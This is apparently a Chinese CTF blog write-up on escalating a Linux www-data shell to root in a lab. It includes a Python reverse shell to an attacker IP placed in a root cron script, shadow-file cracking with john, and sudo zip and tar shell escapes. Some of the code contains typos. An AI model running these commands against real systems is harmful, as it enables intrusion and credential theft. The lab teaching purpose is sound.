15.CTF-web安全提权

最新推荐文章于 2024-05-29 12:02:19 发布
最新推荐文章于 2024-05-29 12:02:19 发布
阅读量1.8k 收藏 11
点赞数
分类专栏: ctf 文章标签: web安全 linux 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/woo233/article/details/127084490
版权

安全提权介绍

往往我们能拿下服务器的web服务只是具有低权限用户(www-data),对于内网渗透,我们需要提权到root。Linux系统的提权过程不止涉及到了漏洞,也涉及了很多系统配置。

提权前提:
已经拿到低权shell
被入侵的机器上面有nc,python,perl等linux非常常见的工具
有权限上传文件和下载文件

实验环境

攻击机: kali linux 192.168.253.12
靶场机器:linux 192.168.253.21

接下来该做什么呢?
目的:目前获得反弹www-data用户shell,获型靶场机器的root权限,得到flag值;

内核漏洞提权

内核漏洞是我们几乎最先想到的提权方法。通杀的内核漏洞是十分少见的,因而我们应该先对系统相关的信息进行收集。

查看发行版本
cat /etc/ issue
cat /etc /*-release

查看内核版本
uname -a
在这里插入图片描述

寻找内核溢出代码
– searchspoit 发行版本 内核版本
在这里插入图片描述

若存在内核溢出:
上传内核溢出代码,编译执行-- gcc xxx.C -o exploit
– chmod +x exploit
– ./exploit

发现无内核溢出:可以用明文root密码提权

大多linux系统的密码都和/etc/passwd和/etc/ shadow这两个配置文件息息相关。passwd里面储存了用户,shadow里面是密码的hash。
出于安全考虑passwd是全用户可读,root可写的。shadow是仅root可读写的。

例如:破解linux用户名和对应的密码

/etc/passwd /etc/shadow  #获取了passwd和shadow之后

unshadow passwd shadow >cracked #将其转化为可识别的cracked文件
iohn cracked  #使用john来破解

在这里插入图片描述
不能使用明文root进行提权,还可以尝试使用计划任务进行提权

计划任务

系统内可能会有一些定时执行的任务,一般这些任务由crontab来管理,具有所属用户的权限。非root权限的用户是不可以列出root用户的计划任务的。但是/etc/内系统的计划任务可以被列出。

默认这些程序以root权限执行,如果有幸遇到一个把其中脚本配置成任意用户可写的管理员,我们就可以修改脚本等回连rootshell;如果定时执行的文件是py脚本,可以使用一下的脚本来替换之前的脚本;

靶场代码
#!/usr/bin/python
import os,subprocess,socket
s=socket.socekt(socket.AF_INET,socket.SOCK_STREAM)
s.connect((“攻击机IP地址”,攻击机监听端口"))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"])

攻击机启动nc 监听端口nc -nlvp port

在这里插入图片描述
发现无可写文件。可以尝试发掘对应的密码

密码复用

很多管理员会重复使用密码,因此数据库或者web后台的密码也许就是root密码。

有了(疑似) root密码怎么办?你一定想ssh登陆。然而ssh很可能禁止root登陆,或是防火墙规则将你排除在外了。返回来想,我们不是有一个低权shell了吗?找个办法再上面“输入”密码就好了。显然,直接在低权shell里面用sudo是不奏效的。这是因为出于安全考虑,linux要求用户必须从终端设备(tty)中输入密码,而不是标准输入(stdin)。换句话说,sudo在你输入密码的时候本质上是读取了键盘,而不是bash里面输入的字符。

因此为了能够输入密码,我们必须模拟一个终端设备。python就有这样的功能。
在shell里面输入:

python -c 'import pty;pty.spawn(" /bin/bash")' #可以尝试/bin/sh 或者/bin/bash

在这里插入图片描述
尝试了3次弱口令之后不行,则进行对应敏感文件的挖掘
pwd查看当前工作目录
切换到home目录
在这里插入图片描述
发现有个ssh,则可以使用该用户远程登陆服务器
还发现一个wordpress
在这里插入图片描述

cat wp-config.php文件
在这里插入图片描述
可以进行远程登陆:
在这里插入图片描述
登陆之后,使用sudo -l查看当前用户可以使用root提权的命令信息;
在这里插入图片描述

1.利用zip进行提权
– touch exploit
– sudo -u root zip exploit.zip exploit -T --unzip -command=“sh -c /bin/bash”

在这里插入图片描述
2.利用tar进行提权
– sudo -u root tar cf /dev/null exploit -checkpoint=1 --checkpoint-action=“/bin/bash”

获取Flag

一般情况下,靶场机器的flag值是存放在服务器的根目录下,/ root/目录。
cd /root/
ls
cat flag
在这里插入图片描述

writeup测试文档总结文档

wow2ok
关注
  • 0
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
CTF web安全经典例题讲解
10-22
本主题集中于CTF赛题中的Web安全部分,通过一系列经典例题来帮助初学者理解和掌握核心技能。以下是根据标题、描述和标签炼出的相关知识点: 1. **SQL注入**:SQL注入是Web应用中常见的安全漏洞,攻击者通过输入...
web
qq_40495877的博客
04-29 2044
这里利用冰蝎远程连接到了靶机上: 利用systeminfo查看靶机系统的补丁; 如果有限可以在靶机上创建txt文件保存,在用冰蝎下载下来,没有的话就复制粘贴到本地txt文件。 然后就利用本机下载的wesng去对比补丁库吧,命令如下: wesng目录下: python wes.py systeminfo.txt -o vuln.csv 对比结果保存为vuln.csv文件: 这里我们就有可利用的补丁漏洞了; 接下来用linux或者忍者系统去创建一个远程木马 命令行下: msfvenom -
linux系统——基于已经拿到www-data
m0re's blog
08-25 1万+
前言:上次学习利用目录遍历漏洞获取了一个反弹的webshell,但是限是www-data,不是root限,所以这次学习,拿到root限。 本文目录介绍方式内核漏洞明文root密码计划任务总结: 介绍 往往我们能拿下服务器的web服务只是具有低限用户(www-data),对于内网渗透,我们需要到root。linux系统的过程不止涉及到了漏洞,也涉及了很多系统配置。 : 已经拿到低shell 被入侵的机器上面有nc,python,perl等非常常见的工具 有
windows web
最新发布
zyw268的博客
05-29 716
Web到Win-系统-人工操作如果中无法执行命令的话,可以尝试上传cmd.exe到可读写目录再调用优点:解决实时更新不集成的EXP缺点:操作繁琐,需要各种复现调试。
CTF-
su__xiaoyan的博客
01-06 2022
通过Web服务拿下服务器的基础限以后(www-data),如何值最高的系统限(root)。 的前条件: 获取服务器的基础限。 能上传或者下载文件。 靶机上面有常见工具或者环境,例如nc,python或者Perl。 Linux操作系统方法: 利用内核漏洞进行 利用错误的系统配置进行 明文密码 计划任务 密码复用 内核漏洞 首先查看系统Linux的发行版本: cat /etc/issue cat /etc/*-release 查看内核版本
升总结
Christ1na的博客
03-07 6121
内网
Web的基本漏洞--
尽欢的博客
06-05 415
的介绍
ctf&
m0_73973498的博客
11-25 585
SUID(Set User ID)是一种特殊限,当用户执行具有SUID位的可执行文件时,该文件将以文件所有者的身份而不是执行者的身份运行。这允许普通用户在执行特定程序时获取特限。
65.Vulnhub靶机渗透之环境搭建及JIS-CTF入门和蚁剑示例(一)1
08-03
【网络安全自学篇】六十五.Vulnhub靶机渗透之环境搭建及JIS-CTF入门和蚁剑示例(一)1 本文主要讲述了网络安全中的靶机渗透技术,特别是通过Vulnhub平台进行环境搭建和JIS-CTF挑战。Vulnhub是一个供虚拟机...
ctf_vm.zip
05-15
\n- **系统安全**:掌握操作系统原理,理解限管理,防御攻击。\n- **编程基础**:熟练使用至少一种编程语言,以便编写漏洞利用脚本。\n- **恶意软件分析**:识别和分析病毒、木马、蠕虫等恶意软件的行为。\n- ...
高级java笔试题-Web-Security-Note:记录一些常见的Web安全站点
06-03
WEB安全 XSS CSP SSRF Sql注入 XXE 命令执行 上传 CSRF 同源策略 文件包含 缓存投毒 反序列化 代码审计 解析漏洞 PHP Thinkphp Python flask JAVA JS 指纹识别技术 Burp 插件 Fuzz Payload JWT HTTP Request ...
2021江西省网络安全职业技能竞赛赛题wp全!
12-21
比赛共分为三个阶段,总时长420分钟,涵盖多个任务,涉及登录安全加固、系统漏洞利用与、CTF夺旗等核心内容。 **A模块:基础设施设置/安全加固** 该模块主要关注服务器系统的安全配置,包括登录策略、密码策略...
网络空间安全中高职业院校职技能大赛——sudo
Jay
12-21 212
可以发现,哪怕是find这种查找命令被赋予了sudo,也能够瞬间为root限,只要我们能够巧妙的利用执行这些命令。
CTF-常见的几种web方法
Reaches_r的博客
08-10 1417
1.内核漏洞 2.明文密码暴力破解3.计划任务 4.密码复用 5.利用zip、tar
升:网站漏洞(思路.)
网络安全领域___专研者.
04-19 1593
升简称,由于操作系统都是多用户操作系统,用户之间都有限控制,比如通过 Web 漏洞拿到的是 Web 进程的限,往往 Web 服务都是以一个限很低的账号启动的,因此通过 Webshell 进行一些操作会受到限制,这就需要将其升为管理甚至是 System 限。通常通过操作系统漏洞或操作系统的错误配置进行,也可以通过第三方软件服务,如数据库或 FTP 等软件的漏洞进行
通过web升至服务器限(ASP网站,利用系统溢出漏洞)整个过程记录
W小哥
03-14 1076
目标IP:192.168.106.130:82 攻击IP:192.168.106.1 原理:利用系统溢出漏洞升 第一步:访问目标网站 第二步:假设已经成功将大马文件上传至目标网站,访问大马 输入后门密码,登录 第三步:执行系统命令ipconfig,如图所示 执行后显示拒绝访问,如图所示 用执行–CMD2测试结果,如图所示 第三步:不能执行cmd命令,我们就自己上传 首先查看一下目录...
CTF靶场内核漏洞 夜车星繁的博客
夜车星繁的博客
03-29 959
VMWARE虚拟机下搭建环境: 攻击机kali IP:192.168.223.136 攻击机win10:本机 靶 机IP:192.168.223.141 首先进行信息收集: nmap -sV 192.168.223.141 更详细的信息:nmap -T4 -A -v192.168.223.141 以上我们得知系统类型,Apache版本、所开放服务端口等重要信息 除...
最全CTF Web题思路总结(更新ing)
热门推荐
yjprolus的博客
02-12 4万+
个人向CTF Web题思路总结笔记
WEB
forbidd3n,keep going
10-25 3417
本文转自《剑眉大侠笔记》,个人觉得思路想法很好,就转载了,其中蓝色字体为本人笔记 1.能不能执行cmd就看这个命令:net user,net不行就用net1,再不行就上传一个net到可写可读目录,执行/c c:\windows\temp\cookies\net1.exe user 注:若net被禁用,可使用aio工具,可进行账户的克隆,该工具还有很多用户,请自行了解 2.当
ctf.show_web9
10-21
ctf.show_web9是一个CTF比赛中的一个web安全题目,考察的是命令执行漏洞的利用方式。这一关需要使用PHP的命令执行函数执行系统命令,读取网站根目录下的配置文件,获取flag。具体来说,需要通过构造payload,将命令注入到URL中,从而执行系统命令,读取配置文件中的flag。其中,引用供了一个读取配置文件的payload,而引用则是ffifdyop的MD5加密结果,可能是某个关键信息的加密结果。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

wow2ok

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值